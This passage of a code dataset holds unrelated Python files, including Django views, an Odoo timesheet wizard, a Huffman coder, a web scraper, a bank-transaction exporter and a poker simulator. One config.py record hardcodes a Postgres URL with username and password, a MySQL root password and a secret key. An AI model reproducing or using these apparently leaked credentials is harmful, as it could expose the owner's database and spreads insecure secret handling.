\t\t\t(2,20,3,2,1),(2,20,3,2,1),(2,20,3,2,1),(2,20,3,2,1),(2,20,3,2,1),(2,20,3,2,1),(2,20,3,2,1),(2,20,3,2,1),(2,20,3,2,1),(2,20,3,2,1),(2,20,3,2,1),(2,20,3,2,1),(2,20,3,2,1),(2,20,3,2,1),(2,20,3,2,1),\n# \t\t\t(2,20,3,2,1),(2,20,3,2,1),(2,20,3,2,1),(2,20,3,2,1),(2,20,3,2,1),(2,20,3,2,1),(2,20,3,2,1),(2,20,3,2,1),(2,20,3,2,1),(2,20,3,2,1),(2,20,3,2,1),(2,20,3,2,1),(2,20,3,2,1),(2,20,3,2,1),(2,20,3,2,1),\n# \t\t\t(2,20,3,2,1),(2,20,3,2,1),(2,20,3,2,1),(2,20,3,2,1),(2,20,3,2,1),(2,20,3,2,1),(2,20,3,2,1),(2,20,3,2,1),(2,20,3,2,1),(2,20,3,2,1),(2,20,3,2,1),(2,20,3,2,1),(2,20,3,2,1),(2,20,3,2,1),(2,20,3,2,1),(2,20,3,2,1),\n# \t\t\t(2,20,3,2,1),(2,20,3,2,1),(2,20,3,2,1),(2,20,3,2,1),(2,20,3,2,1),(2,20,3,2,1),(2,20,3,2,1),(2,20,3,2,1),(2,20,3,2,1),(2,20,3,2,1),(2,20,3,2,1),(2,20,3,2,1),(2,20,3,2,1),(2,20,3,2,1),\n# \t\t\t(2,20,3,2,1),(2,20,3,2,1),(2,20,3,2,1),(2,20,3,2,1),(2,20,3,2,1),(2,20,3,2,1),(2,20,3,2,1),(2,20,3,2,1),(2,20,3,2,1),(2,20,3,2,1),(2,20,3,2,1),(2,20,3,2,1),(2,20,3,2,1),\n# \t\t\t(2,20,3,2,1),(2,20,3,2,1),(2,20,3,2,1),(2,20,3,2,1),(2,20,3,2,1),(2,20,3,2,1),(2,20,3,2,1),(2,20,3,2,1),(2,20,3,2,1),(2,20,3,2,1),(2,20,3,2,1),(2,20,3,2,1),(2,20,3,2,1),(2,20,3,2,1),])\n# \treturn render(request, 'home.html', {'geodata':geodata})\n\n \n\ndef index(request):\n return render(request, 'index.html')\n\n\n\n\n\ndef result(request):\n\tif request.method == \"POST\":\n\t\ttemp={}\n\t\ttemp['Quiz']=request.POST.get('Quiz')\n\t\tprint(temp['Quiz'])\n\t\ttemp['sampletest']=request.POST.get('sampletest')\n\t\ttemp['playing']=request.POST.get('playing')\n\t\ttemp['sleeping']=request.POST.get('sleeping')\n\t\ttemp['learning']=request.POST.get('learning')\n\t\tprint(temp)\n\t\t#headers= {'Content-Type':'application/json'}\n\t\t#read= requests.post('http://127.0.0.1:8000/checkapi/',json=temp,headers=headers)\n\t\t#home(request)\n\t\tdata=pd.read_csv('datagas.csv')\n\t\t#print(data)\n\t\t#quiz= request.POST.get('quiz')\n\t\t#print(quiz)\n\t\t#context= {'quiz': quiz}\n\t\t\n\t \n\t\tdata.head()\n\t\tdata.isnull().sum()\n\t\t#print(data)\n\t\tmapper = DataFrameMapper([(['Quiz','sampletest','playing','sleeping','learning'], preprocessing.StandardScaler())])\n\t\tpipeline_obj = pipeline.Pipeline([('mapper',mapper),(\"model\", ensemble.RandomForestRegressor())])\n\t\t# data.columns\n\t\tX=['Quiz', 'sampletest', 'playing', 'sleeping','learning']\n\t\tY=['Total']\n\t\tpipeline_obj.fit(data[X],data[Y].values.ravel())\n\t\t#print(pipeline_obj.predict(data[X]))\n\t\tjb.dump(pipeline_obj,'RFModelforMPG.pkl')\n\t\tmodelReload=jb.load('RFModelforMPG.pkl')\n\t\t#print(modelReload.predict(data[X]))\n\t\t#sampledata={1:{'quiz':2,'sampletest':10,'sleep':2,'learn':5},2:{'quiz':2,'sampletest':10,'sleep':2,'learn':5},3:{'quiz':2,'sampletest':10,'sleep':2,'learn':5}}\n\n\t\t#print((temp['Quiz']*2)+ (temp['sampletest']*2)+ (temp['sleeping']*2))\n\t\ttestDtaa=pd.DataFrame({'x':temp}).transpose()\n\t\t#print(testDtaa)\n\t\t#print(modelReload.predict(testDtaa)[0])\n\t\treturn render(request, 'result.html',{'quiz':modelReload.predict(testDtaa)[0]})\n\n\n\nclass TestView(APIView):\n\tdef get(self,request,*args,**kwargs):\n\t\tdata=pd.read_csv('datagas.csv')\n\t\tmapper = DataFrameMapper([\n (['Quiz','sampletest','playing','sleeping','learning'], preprocessing.StandardScaler())])\n\t\tpipeline_obj = pipeline.Pipeline([('mapper',mapper),(\"model\", ensemble.RandomForestRegressor())])\n\t\tX=['Quiz', 'sampletest', 'playing', 
'sleeping','learning']\n\t\tY=['Total']\n\t\tpipeline_obj.fit(data[X],data[Y].values.ravel())\n\t\tpipeline_obj.predict(data[X])\n\t\tprint(data['id'])\n\t\tprint(dict(zip(data['id'],pipeline_obj.predict(data[X]))))\n\t\t#result(request)\n\t\t#outdata=\"hello python\"\n\t\t#data = {\n\t\t#'name':'vaish',\n\t\t# 'age':25\n\t\t# }\n\t\t\n\t\treturn Response(dict(zip(data['id'],pipeline_obj.predict(data[X]))))\n\n\n\n# class TestView1(APIView):\n# \tdef get(self,request,*args,**kwargs):\n# \t\t#result(request)\n# \t\toutdata=\"hello python\"\n# \t\tdata = {\n# \t\t'name':'vaish',\n# \t\t'age':25\n# \t\t}\n# \t\treturn Response(outdata)\n","sub_path":"application/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":7506,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
{"seq_id":"550630835","text":"import datetime\n\nfrom odoo import api, models\nfrom odoo.exceptions import UserError\nfrom odoo.tools.translate import _\n\n\nclass CalendarEventFinish(models.TransientModel):\n    _inherit = 'calendar.event.finish'\n\n    @api.multi\n    def action_finish_calendar_event(self):\n        \"\"\"Finish the calendar event and create a timesheet entry\n        (account.analytic.line).\n\n        Raises:\n            UserError -- when the event has no project and/or is already finished.\n\n        Returns:\n            dict -- dict containing 'ir.actions.act_window_close'.\n        \"\"\"\n\n        self.ensure_one()\n        res = super(CalendarEventFinish, self).action_finish_calendar_event()\n\n        ce = self.calendar_event_id\n\n        if ce.project_id and ce.event_state == 'done':\n            dt = datetime.datetime.strptime(ce.start_datetime,\n                                            '%Y-%m-%d %H:%M:%S')\n\n            partners = [item.id for item in ce.partner_ids\n                        if item.parent_id == ce.company_partner_id]\n\n            users = self.env['res.users'].search([('partner_id', 'in', partners)])\n\n            # Create a timesheet entry for every user in the users list\n            for user in users:\n                values = self._get_account_analytic_line_values(\n                    user=user, calendar_event=ce, start_datetime=dt)\n\n                # Use sudo so that one user is allowed to\n                # create entries for other users\n                self.env['account.analytic.line'].sudo().create(values)\n        else:\n            raise UserError(_(\"To finish this event, it must be in 'Open' \"\n                              \"state and select a project\"))\n\n        return res\n\n    @api.multi\n    def _get_account_analytic_line_values(self, user, calendar_event, start_datetime):\n        \"\"\"Return the values used to create a timesheet entry\n        (account.analytic.line).\n\n        Arguments:\n            user {res.users} -- User the entry will be assigned to.\n            calendar_event {calendar.event} -- Calendar event to be used in the entry.\n            start_datetime {datetime} -- datetime object with the event's date and time.\n\n        Returns:\n            dict -- Dict with the account.analytic.line values.\n        \"\"\"\n\n        self.ensure_one()\n        values = {\n            'name': calendar_event.name,\n            'date': start_datetime.date(),\n            'user_id': user.id,\n            'customer_partner_id': calendar_event.customer_partner_id.id,\n            'company_id': calendar_event.user_id.company_id.id,\n            'project_id': calendar_event.project_id.id,\n            'unit_amount': calendar_event.event_duration,\n            'calendar_event_id': calendar_event.id,\n        }\n\n        if calendar_event.task_id:\n            values['task_id'] = calendar_event.task_id.id\n            values['project_task_type_id'] = calendar_event.task_id.stage_id.id\n\n        return 
values\n","sub_path":"calendar_event_timesheet/wizards/calendar_event_finish.py","file_name":"calendar_event_finish.py","file_ext":"py","file_size_in_byte":2980,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"167045530","text":"import re\r\n\r\ndef correct(query):\r\n \r\n add=\"C:\\\\Users\\\\DELL\\\\Desktop\\\\Project\\\\Bing\\\\paragraph\\\\\"+query+\".txt\"\r\n add1=\"C:\\\\Users\\\\DELL\\\\Desktop\\\\Project\\\\Bing\\\\paragraph1\\\\\"+query+\".txt\"\r\n file = open(add,'r',encoding=\"utf-8\")\r\n file1= open(add1,'a',encoding=\"utf-8\")\r\n i=0\r\n s=\"\"\r\n while(True):\r\n r=file.readline()\r\n s+=r\r\n i+=1\r\n if(i==100 or r==\"\"):\r\n i=0\r\n s=re.sub(\"[\\{(<\\[].*?[\\>)}\\]]\", \"\", s)\r\n file1.write(s)\r\n s=\"\"\r\n #\\{([^()]|())*\\} \r\n if(r==\"\"):\r\n break\r\n \r\ncorrect(\"swine flu vaccine\")\r\n","sub_path":"Test.py","file_name":"Test.py","file_ext":"py","file_size_in_byte":633,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"343484730","text":"from math import log2, acos, sqrt, pi\nimport turtle\n\n\nclass ListNew(list):\n @property\n def last_index(self):\n return len(self) - 1\n\n def __gt__(self, other):\n return len(self) > other\n\n\nclass PriorityQueue:\n def __init__(self, items=[]):\n self.contents = ListNew()\n for item in items:\n self.contents.append(item)\n self.heapify_up()\n\n def __bool__(self):\n return bool(self.contents)\n\n @property\n def last(self):\n return self.contents.last_index\n\n def last_element(self):\n return self.contents[self.last]\n\n @staticmethod\n def left_child(i):\n return 2 * i + 1\n\n @staticmethod\n def right_child(i):\n return 2 * i + 2\n\n @staticmethod\n def parent(i):\n return (i - 1)//2\n\n def heapify_up(self):\n new = self.last\n while new >= 1:\n parent = self.parent(new)\n if self.contents[new] < self.contents[parent]:\n self.contents[new], self.contents[parent] = self.contents[parent], self.contents[new]\n new = parent\n else:\n return\n\n def search(self, node):\n return self.contents.index(node)\n\n def insert(self, item):\n self.contents.append(item)\n self.heapify_up()\n\n def delete(self, node=None):\n if node is None:\n root = self.contents[0]\n self.contents[0], self.contents[self.last] = self.contents[self.last], self.contents[0]\n self.contents.pop()\n self.heapify_down()\n return root\n else:\n index = self.search(node)\n self.contents[index], self.contents[self.last] = self.contents[self.last], self.contents[index]\n self.contents.pop()\n self.heapify_down(index)\n\n def heapify_down(self, index=0):\n mini = index\n while index < len(self.contents):\n left = self.left_child(index)\n right = self.right_child(index)\n if left < len(self.contents) and right < len(self.contents):\n if self.contents[right] < self.contents[left]:\n min_child_index = right\n else:\n min_child_index = left\n if self.contents[min_child_index] <= self.contents[index]:\n mini = min_child_index\n elif left < len(self.contents):\n if self.contents[left] <= self.contents[index]:\n mini = left\n if index == mini:\n return\n self.contents[index], self.contents[mini] = self.contents[mini], self.contents[index]\n index = mini\n\n def peek(self):\n return self.contents[0]\n\n\nclass HuffmanTree:\n class Node:\n def __init__(self, value=None, probability=None, l_child=None, r_child=None):\n self.value = value\n self.probability = probability\n self.l_child = l_child\n self.r_child = r_child\n\n def __eq__(self, other):\n 
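# Comparison operators delegate to self.probability, so PriorityQueue's\n            # min-heap ordering works whether 'other' is another Node (which falls\n            # back to its own comparison methods) or a plain number.\n            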
return self.probability == other\n\n def __lt__(self, other):\n return self.probability < other\n\n def __le__(self, other):\n return self.probability <= other\n\n def __gt__(self, other):\n return self.probability > other\n\n def __ge__(self, other):\n return self.probability >= other\n\n def __init__(self):\n self.root = None\n\n class HuffmanEncoder:\n @staticmethod\n def get_frequency(text):\n count = {}\n all_sum = 0\n for character in text:\n count[character] = count.get(character, 0) + 1\n all_sum += 1\n # all_sum = sum(count[ch] for ch in count)\n return [(ch, count[ch] / all_sum) for ch in count]\n\n def huffman_coding(self, symbols):\n queue = PriorityQueue()\n for symbol, frequency in symbols:\n queue.insert(self.Node(value=symbol, probability=frequency))\n while queue.contents > 1:\n # for node in queue.contents:\n # print(node.value, node.probability, end=\" \")\n # print()\n node1 = queue.delete()\n node2 = queue.delete()\n parent_node = self.Node(value=None, probability=(node1.probability + node2.probability),\n l_child=node2, r_child=node1)\n queue.insert(parent_node)\n self.root = queue.delete()\n return self.root\n\n def _get_code(self, cur_node, code=\"\", codes_array=[]):\n\n if cur_node is not None:\n if cur_node.value is not None:\n codes_array.append((cur_node.value, code))\n if cur_node.l_child is not None:\n code += \"0\"\n self._get_code(cur_node.l_child, code, codes_array)\n code = code[:-1]\n if cur_node.r_child is not None:\n code += \"1\"\n self._get_code(cur_node.r_child, code, codes_array)\n return codes_array\n\n def get_codes(self):\n if self.root is not None:\n return sorted(self._get_code(self.root), key=lambda pair: pair[0])\n\n @staticmethod\n def entropy(symbols):\n return -sum(probability * log2(probability) for symbol, probability in symbols)\n\n @staticmethod\n def average_len(codes, symbols):\n return sum(probability[1] * len(symbol[1]) for symbol, probability in zip(codes, symbols))\n\n def _draw(self, cur_node, pen, origin, floors):\n if cur_node is not None:\n pen.penup()\n pen.setposition(origin)\n pen.pendown()\n if cur_node.value is not None:\n pen.write(cur_node.value)\n else:\n pen.write(\"{:0.2f}\".format(cur_node.probability))\n node_dist = 32\n distance = node_dist * sqrt((1 + ((2 ** abs(floors) * 13) ** 2)/(5*node_dist**2)))\n # distance = sqrt(42*log2(abs(floors**2))/(0.34*5))\n angle = 180/pi * acos(node_dist/distance)\n if cur_node.l_child is not None:\n pen.setposition(origin)\n # turtle.pendown()\n pen.right(angle)\n pen.forward(distance)\n left = pen.position()\n pen.left(angle)\n if cur_node.l_child is not None:\n self._draw(cur_node.l_child, pen, left, floors - 0.85)\n if cur_node.r_child is not None:\n pen.penup()\n pen.setposition(origin)\n pen.pendown()\n pen.left(angle)\n pen.forward(distance)\n right = pen.position()\n pen.right(angle)\n if cur_node.r_child is not None:\n self._draw(cur_node.r_child, pen, right, floors - 0.85)\n\n def draw(self, alphabet):\n if self.root is not None:\n pen = turtle.Turtle()\n pen.hideturtle()\n pen.speed(1)\n pen.setheading(-90)\n pen.penup()\n pen.goto(0, 260)\n pen.pendown()\n turtle.Screen().screensize(900, 900)\n self._draw(self.root, pen, pen.position(), sqrt(len(alphabet)))\n\n def encode(self, text):\n freq = self.HuffmanEncoder.get_frequency(text)\n\n # print(freq)\n self.huffman_coding(freq)\n codes = self.get_codes()\n # print(max(len(code[1]) for code in codes))\n # print(codes)\n # print(HuffmanTree.average_len(codes, freq))\n encoded_string = self._encode(text, codes)\n return 
encoded_string\n\n def _encode(self, text, codes):\n encoded_string = \"\"\n dic = {code[0]: code[1] for code in codes}\n for ch in text:\n if ch in dic:\n encoded_string += dic[ch]\n return encoded_string\n\n def decode(self, encoded_string):\n codes = self.get_codes()\n decoded_string = \"\"\n dic = {code[1]: code[0] for code in codes}\n buffer = \"\"\n for ch in encoded_string:\n buffer += ch\n if buffer in dic:\n decoded_string += dic[buffer]\n buffer = \"\"\n return decoded_string\n\n\ndef main():\n with open(\"alice29.txt\", 'r') as input_f:\n data = input_f.read()\n data.rstrip()\n huf_tree = HuffmanTree()\n text = data\n encoded = huf_tree.encode(text)\n print(len(text) * 4)\n print(len(encoded))\n decoded = huf_tree.decode(encoded)\n print(decoded == data)\n # source = [(\"a_1\", 0.25), (\"a_2\", 0.25), (\"a_3\", 0.125), (\"a_4\", 0.125),\n # (\"a_5\", 0.125), (\"a_6\", 0.0625), (\"a_7\", 0.0625)]\n\n # source = [(\"а\", 0.064), (\"б\", 0.015), (\"в\", 0.039), (\"г\", 0.014),\n # (\"д\", 0.026), (\"е ё \", 0.074), (\"ж\", 0.008),\n # (\"з\", 0.015), (\"и\", 0.064), (\"й\", 0.010), (\"к\", 0.029),\n # (\"л\", 0.036), (\"м\", 0.026), (\"н\", 0.056),\n # (\"о\", 0.096), (\"п\", 0.024), (\"р\", 0.041), (\"с\", 0.047),\n # (\"т\", 0.056), (\"у \", 0.021), (\"ф\", 0.020), (\"х\", 0.009),\n # (\"ц\", 0.004), (\"ч\", 0.013), (\"ш\", 0.006), (\"щ \", 0.003),\n # (\"ъ ь\", 0.015), (\"ы\", 0.016), (\"э \", 0.003), (\"ю\", 0.007), (\"я\", 0.019), (\"-\", 0.124)]\n\n # source = [(\"a_1\", 0.4), (\"a_2\", 0.15), (\"a_3\", 0.15), (\"a_4\", 0.15), (\"a_5\", 0.15)]\n\n # huf.huffman_coding([(\"a_1\", 0.4), (\"a_2\", 0.15), (\"a_3\", 0.15), (\"a_4\", 0.15), (\"a_5\", 0.15)])\n # print(huf.entropy([(\"a_1\", 0.4), (\"a_2\", 0.15), (\"a_3\", 0.15), (\"a_4\", 0.15), (\"a_5\", 0.15)]))\n # huf.huffman_coding(source)\n # print(\"entropy is \" + str(HuffmanTree.entropy(source)) + \" bits\")\n # array_of_codes = huf.get_codes()\n # print(HuffmanTree.average_len(array_of_codes, source))\n # print(\"array of codes:\", array_of_codes)\n # huf.draw(source)\n # turtle.done()\n\n\nmain()\n","sub_path":"Huffman.py","file_name":"Huffman.py","file_ext":"py","file_size_in_byte":9902,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"317023200","text":"from django.shortcuts import render, HttpResponse\nfrom firstapp.models import Article\nimport MySQLdb\n# from django.template import Context, Template\n# Create your views here.\n\n\ndef index(request):\n coon = MySQLdb.connect(\n host='localhost',\n port=3306,\n user='root',\n password='123456',\n db='django4',\n charset='utf8'\n )\n\n cursor = coon.cursor()\n cursor.execute('select * from firstapp_article')\n # count = cursor.execute('select * from firstapp_article')\n # print(count)\n results = cursor.fetchall()\n # print(results)\n article_list = []\n for result in results:\n article_list.append(\n {\n 'title': result[1],\n 'content': result[2]\n }\n )\n # print(article_list)\n context = {}\n context['article_list'] = article_list\n return render(request, 'first_web_2.html', context)\n","sub_path":"Level4Code/lesson4firstDjango/LessonCode/root/firstsite/firstapp/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":916,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"636876599","text":"import os\nPROPAGATE_EXCEPTIONS = True\nHOST = os.environ.get(\"HOST\",\"localhost\")\nPORT = int(os.environ.get('PORT', 5000))\nSQLALCHEMY_DATABASE_URI = 
os.environ.get('DATABASE_URL', 'mysql://root:admin@localhost/metablog')\nSQLALCHEMY_TRACK_MODIFICATIONS = False\nDATABASE_URL = 'postgres://hkbpscejzgkloi:Ie1vb9I9w26EEVWzhLAmSpFTt6@ec2-107-21-101-67.compute-1.amazonaws.com:5432/dbeopj0ffollee'\n\nWTF_CSRF_ENABLED = True\nSECRET_KEY = '7shenron@!'\n","sub_path":"config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":441,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"501795323","text":"from pyspark import SparkContext\n\nsc = SparkContext(appName=\"demo03\")\n\nbooks = sc.textFile(\"/home/spark/hadoop-2.7.3/LICENSE.txt\")\n\n\ndef parse_book(line):\n try:\n words = line.split(\",\")\n return (words[3], float(words[4]))\n except:\n return ()\n\n\nresults1 = books.map(parse_book)\\\n .filter(lambda sp: len(sp) > 0)\\\n .reduceByKey(lambda acc,price: acc + price)\\\n .collect()\n\nprint(results1)\n\n\nresults2 = books.map(parse_book)\\\n .filter(lambda sp: len(sp) > 0)\\\n .aggregateByKey(0, lambda x,y: x+y, lambda x,y: x+y)\\\n .collect()\n\nprint(results2)\n\nsc.stop()\n","sub_path":"spark/pyspark/rdd/demo03.py","file_name":"demo03.py","file_ext":"py","file_size_in_byte":597,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"262010280","text":"#coding=utf-8\nimport urllib2\nimport urllib\nimport sys\nimport json\nfrom bs4 import BeautifulSoup\nreload(sys)\nsys.setdefaultencoding('utf-8')\n\nurl = 'https://www.douyu.com/directory'\n\ndef GetDirectory():\n response = urllib2.urlopen(url)\n content = response.read()\n list_href = []\n list_name = []\n soup = BeautifulSoup(content, \"html.parser\")\n for h in soup.find_all('a','thumb'):\n list_href.append(h.get('href'))\n list_name.append(h.find('p').string)\n\n dic = dict(zip(list_name,list_href))\n return dic\n\n #print soup.prettify()\n\ndef GetFirstPage(directory):\n douyu = \"https://www.douyu.com\"\n for item in directory.itervalues():\n u = douyu + item\n responses = urllib2.urlopen(u)\n contents = responses.read()\n soups = BeautifulSoup(contents,\"html.parser\")\n listName = []\n listNum = []\n for p in soups.find_all(\"div\",\"mes\"):\n listName.append(p.find('h3').string)\n listNum.append(p.find(\"span\",\"dy-num fr\").string)\n #dic = dict(zip(listName,listNum))\n with open(\"E:\\douyu.txt\",'a') as f:\n f.write(str(listName))\n f.close()\n #print json.dumps(dic,ensure_ascii=False, encoding='UTF-8')\n\n\nif __name__ == '__main__':\n directory = GetDirectory()\n GetFirstPage(directory)\n","sub_path":"douyu.py","file_name":"douyu.py","file_ext":"py","file_size_in_byte":1336,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"261381320","text":"from fints2ledger.transaction_retriever import TRetriever\nfrom fints.client import FinTS3PinTanClient\nfrom fints2ledger.csv_converter import CsvConverter\nfrom mt940.models import Date\n\n\nclass Fints2Csv:\n def __init__(self, config):\n self.config = config\n\n def retrieveAndSave(self):\n client = FinTS3PinTanClient(\n self.config[\"fints\"][\"blz\"], # Your bank's BLZ\n self.config[\"fints\"][\"account\"], # your account number\n self.config[\"fints\"][\"password\"],\n # e.g. 
'https://fints.ing-diba.de/fints/'\n self.config[\"fints\"][\"endpoint\"]\n )\n\n retriever = TRetriever(client, self.config[\"fints\"][\"account\"])\n converter = CsvConverter(self.config[\"fints\"][\"csv_separator\"])\n\n csv_output = \"\\n\".join(map(lambda transaction: converter.convert(\n transaction), retriever.get_hbci_transactions(self.config[\"fints\"][\"start\"], Date.today())))\n\n with open(self.config[\"files\"][\"csv_file\"], 'w') as f:\n f.write(converter.get_headline())\n f.write(\"\\n\")\n f.write(csv_output)\n","sub_path":"fints2ledger/fints2csv.py","file_name":"fints2csv.py","file_ext":"py","file_size_in_byte":1109,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"554380985","text":"import random\nimport collections\n\nPALOS = ['Espadas', 'Corazones', 'Diamantes', 'Treboles']\nVALORES = ['As', '2', '3', '4', '5', '6', '7', '8', '9', '10', 'J', 'Q', 'K']\n\ndef crear_baraja():\n barajas = []\n for palo in PALOS:\n\n for valor in VALORES:\n barajas.append((palo, valor))\n \n return barajas\n\n\ndef obtener_mano(barajas, tamano_mano):\n return random.sample(barajas, tamano_mano)\n \n\ndef coincidencias(mano, tamano_coincidencia):\n num_coincidencias = 0\n valores = []\n for carta in mano:\n valores.append(carta[1])\n counter = dict(collections.Counter(valores))\n for i in counter.values():\n if i == tamano_coincidencia:\n num_coincidencias += 1\n return num_coincidencias\n\n\ndef escalera(mano):\n valores = []\n for carta in mano:\n valores.append(carta[1])\n for i, val in enumerate(valores):\n if val == 'As':\n valores[i] = 1\n elif val == 'J':\n valores[i] = 11\n elif val == 'Q':\n valores[i] = 12\n elif val == 'K':\n valores[i] = 13\n else:\n valores[i] = int(val)\n \n valores = sorted(valores)\n escalera = True\n for i in range(len(valores)-1):\n if i == 0:\n if valores[0]==1 and valores[len(valores)-1]==13:\n pass\n elif valores[i]+1 != valores[i+1]:\n escalera = False\n break\n\n return escalera\n\n\ndef color(mano):\n palos = []\n for carta in mano:\n palos.append(carta[0])\n coincidencia = True\n for i in range(len(palos)-1):\n if palos[i] != palos[i+1]:\n coincidencia = False\n\n return coincidencia\n \n\ndef probabilidad_pares(intentos, barajas, tamano_mano):\n contar = 0\n for _ in range(intentos):\n mano = obtener_mano(barajas, tamano_mano)\n if coincidencias(mano, 2):\n contar += 1\n return contar/intentos\n \n\ndef probabilidad_un_par(intentos, barajas, tamano_mano):\n contar = 0\n for _ in range(intentos):\n mano = obtener_mano(barajas, tamano_mano)\n if coincidencias(mano, 2)==1:\n contar += 1\n return contar/intentos\n\n\ndef probabilidad_dos_pares(intentos, barajas, tamano_mano):\n contar = 0\n for _ in range(intentos):\n mano = obtener_mano(barajas, tamano_mano)\n if coincidencias(mano, 2)==2:\n contar += 1\n return contar/intentos\n\n\ndef probabilidad_trio(intentos, barajas, tamano_mano):\n contar = 0\n for _ in range(intentos):\n mano = obtener_mano(barajas, tamano_mano)\n if coincidencias(mano, 3):\n contar += 1\n return contar/intentos\n\ndef probabilidad_escalera(intentos, barajas, tamano_mano):\n contar = 0\n for _ in range(intentos):\n mano = obtener_mano(barajas, tamano_mano)\n if escalera(mano):\n contar += 1\n return contar/intentos\n\n\ndef probabilidad_color(intentos, barajas, tamano_mano):\n contar = 0\n for _ in range(intentos):\n mano = obtener_mano(barajas, tamano_mano)\n if color(mano):\n contar += 1\n return contar/intentos\n\n\ndef probabilidad_full(intentos, barajas, 
tamano_mano):\n contar = 0\n for _ in range(intentos):\n mano = obtener_mano(barajas, tamano_mano)\n if coincidencias(mano, 2) and coincidencias(mano, 3):\n contar += 1\n return contar/intentos\n\n\ndef probabilidad_poker(intentos, barajas, tamano_mano):\n contar = 0\n for _ in range(intentos):\n mano = obtener_mano(barajas, tamano_mano)\n if coincidencias(mano, 4):\n contar += 1\n return contar/intentos\n\n\ndef probabilidad_escalera_color(intentos, barajas, tamano_mano):\n contar = 0\n for _ in range(intentos):\n mano = obtener_mano(barajas, tamano_mano)\n if escalera(mano) and color(mano):\n contar += 1\n return contar/intentos\n\n\ndef probabilidad_escalera_real(intentos, barajas, tamano_mano):\n contar = 0\n for _ in range(intentos):\n mano = obtener_mano(barajas, tamano_mano)\n real = False\n for i, j in mano:\n if j == 'A':\n real = True\n if escalera(mano) and color(mano) and real:\n contar += 1\n return contar/intentos\n\n\nif __name__ == \"__main__\":\n barajas = crear_baraja()\n tamano_mano = int(input('Cuántas cartas quieres: '))\n intentos = int(input('Cuántas veces quieres simular: '))\n print(f'Probabilidad de Pares: {probabilidad_pares(intentos, barajas, tamano_mano)}')\n print(f'Probabilidad de Un Par: {probabilidad_un_par(intentos, barajas, tamano_mano)}')\n print(f'Probabilidad de Dos Pares: {probabilidad_dos_pares(intentos, barajas, tamano_mano)}')\n print(f'Probabilidad de Trio: {probabilidad_trio(intentos, barajas, tamano_mano)}')\n print(f'Probabilidad de Escalera: {probabilidad_escalera(intentos, barajas, tamano_mano)}')\n print(f'Probabilidad de Color: {probabilidad_color(intentos, barajas, tamano_mano)}')\n print(f'Probabilidad de Full House: {probabilidad_full(intentos, barajas, tamano_mano)}')\n print(f'Probabilidad de Poker: {probabilidad_poker(intentos, barajas, tamano_mano)}')\n print(f'Probabilidad de Escalera de Color: {probabilidad_escalera_color(intentos, barajas, tamano_mano)}')\n print(f'Probabilidad de Flor Imperial: {probabilidad_escalera_real(intentos, barajas, tamano_mano)}')","sub_path":"Estadistica_computacional/decks.py","file_name":"decks.py","file_ext":"py","file_size_in_byte":5375,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"339109475","text":"from django.shortcuts import render,HttpResponse\nfrom django.http import Http404\nfrom django.shortcuts import render_to_response, get_object_or_404\nfrom data.models import UnemploymentByStateMonthly, UsState, NatalityByStateYearly, MortalityByStateYearly\nfrom forms import UsStateSelectForm, kmeansNumSamplesForm, YearlyMapAggregationForm\nfrom django.template import RequestContext\nfrom django.db.models import Avg, Max, Min, Sum\nimport numpy\nimport json as simplejson\n# Import Michael's implementation for kmeans\nimport kmeans\ndef index(request):\n\treturn render_to_response('visualization/index.html', {\n\t\t}, context_instance=RequestContext(request))\n\n\ndef timeseries_unemployment(request):\n\tstate=None\n\tdata = None\n\tform = UsStateSelectForm()\n\tif request.method == 'POST':\n\t\tform = UsStateSelectForm(request.POST)\n\t\tif form.is_valid():\n\t\t\tstates = form.cleaned_data['name']\n\t\t\tstates_id = [ int(state.id) for state in states ]\n\t\t\tdata = UnemploymentByStateMonthly.objects.filter(state__id__in = states_id ).order_by('state','year','month')\n\t\n\treturn render_to_response('visualization/linechart.html', {\n\t\t'data': data,\n\t\t'form':form,\n\t\t'state': state,\n\t\t'title': 'Unemployment 
(monthly)',\n\t\t'subtitle': '',\n\t\t'y_axis': '%s of state population' % '%',\n\t\t}, context_instance=RequestContext(request))\n\ndef timeseries_natality(request,variable='num_births'):\n\tstate=None\n\tdata = None\n\tform = UsStateSelectForm()\n\ttitle=yaxis=None\n\tif request.method == 'POST':\n\t\tform = UsStateSelectForm(request.POST)\n\t\tif form.is_valid():\n\t\t\tstates = form.cleaned_data['name']\n\t\t\tstates_id = [ int(state.id) for state in states ]\n\n\t\t\tif (len(states_id)>0):\n\t\t\t\t# Aggregate by state and year\n\t\t\t\tif variable in ('num_births','birth_rate','fertility_rate'):\n\t\t\t\t\tdata = NatalityByStateYearly.objects.filter(state__id__in= states_id).values('state','year').select_related('state__name').annotate(value=Sum(variable))\n\t\t\t\t\tif variable=='num_births':\n\t\t\t\t\t\tdata = data.filter(num_births__isnull=False ).order_by('state','year').values('state','state__name','year','value')\n\t\t\t\t\t\ttitle = 'Number of Births (yearly)'\n\t\t\t\t\t\tyaxis='births'\n\t\t\t\t\telif variable=='birth_rate':\n\t\t\t\t\t\tdata = data.filter(birth_rate__isnull=False ).order_by('state','year').values('state','state__name','year','value')\n\t\t\t\t\t\ttitle = 'Births rate (yearly)'\n\t\t\t\t\t\tyaxis='birth rate (per 1000)'\n\t\t\t\t\telif variable=='fertility_rate':\n\t\t\t\t\t\ttitle = 'Fertility rate (yearly)' \n\t\t\t\t\t\tyaxis='fertility rate (per 1000)'\n\t\t\t\t\t\tdata = data.filter(fertility_rate__isnull=False ).order_by('state','year').values('state','state__name','year','value')\n\t\t\t\telse:\n\t\t\t\t\traise Http404\n\t\t\telse:\n\t\t\t\tdata = 